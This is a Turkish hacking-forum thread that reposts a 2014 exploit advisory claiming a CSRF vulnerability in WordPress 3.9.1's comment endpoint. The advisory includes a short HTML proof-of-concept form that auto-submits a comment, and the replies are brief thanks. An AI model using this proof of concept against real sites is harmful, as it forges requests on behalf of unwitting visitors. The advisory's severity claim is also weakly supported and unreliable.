Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Wordpress 3.9.1 - CSRF Vulnerability
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #1
Wordpress 3.9.1 - CSRF Vulnerability
23.06.2014 14:45
Full title :Wordpress 3.9.1 - CSRF Vulnerability
Date add :2014-06-22
Category :web applications
Platform :php



PHP Kod:
# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
  
# Author:Avinash Kumar Thapa
  
#URL: localhost/wordpress/
  
#PATCH/FIX:Not fixed yet.
  
################################################################################​###################
  
Technical Details:
  
This is the new version released by Wordpress.
  
version is 3.9.1(Latest)
  
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
  
################################################################################​#####################
  
Exploit Code:
  
<
html>
  
  <!-- 
CSRF PoC generated by **Avinash Kumar Thapa** -->
  
  <
body>
  
    <
form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
  
      <
input type="hidden" name="author" value="Anonymous" />
  
      <
input type="hidden" name="email" value="[email protected]/>
  
      <
input type="hidden" name="url" value="www.random.com" />
  
      <
input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
  
      <
input type="hidden" name="submit" value="Post Comment" />
  
      <
input type="hidden" name="comment_post_ID" value="1" />
  
      <
input type="hidden" name="comment_parent" value="0" />
  
      <
input type="submit" value="Submit form" />
  
    </
form>
  
  </
body>
  
</
html>
 
################################################################################​###########################
----
-- 
Avinash
  
a
.k.a
  
**SPID3R**
 
twitter: @m_avinash143<https://twitter.com/m_avinash143>
 
# 2176756D962A5753   1337day.com [2014-06-23]   3C403FE073E403FD # 
(Bu konu en son: 23.06.2014 Tarihinde, Saat: 14:46 düzenlenmiştir. Düzenleyen: H4CK4L.)

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Ebu Azeri
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 8
Yaşam Puanı: 9 / 182
Deneyim: 29 / 100
Rep Sayısı: 6
Mesaj Sayısı: 87
Üyelik Tarihi: 09.11.2013
     
Yorum: #2
Cvp: Wordpress 3.9.1 - CSRF Vulnerability
23.06.2014 14:58
eline saglik reyiz
Alinti
CoNsTaNTiN
*
avatar
Teğmen - Ex
Durum: Çevrimdışı
Seviye Puanı: 22
Yaşam Puanı: 177 / 536
Deneyim: 45 / 100
Rep Sayısı: 14
Mesaj Sayısı: 601
Üyelik Tarihi: 21.10.2013
     
Yorum: #3
Cvp: Wordpress 3.9.1 - CSRF Vulnerability
23.06.2014 15:13
eline saglik
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #4
Cvp: Wordpress 3.9.1 - CSRF Vulnerability
23.06.2014 15:27
eline sağlık reis


Alinti



1 Ziyaretçi
[-]
Sponsor Reklam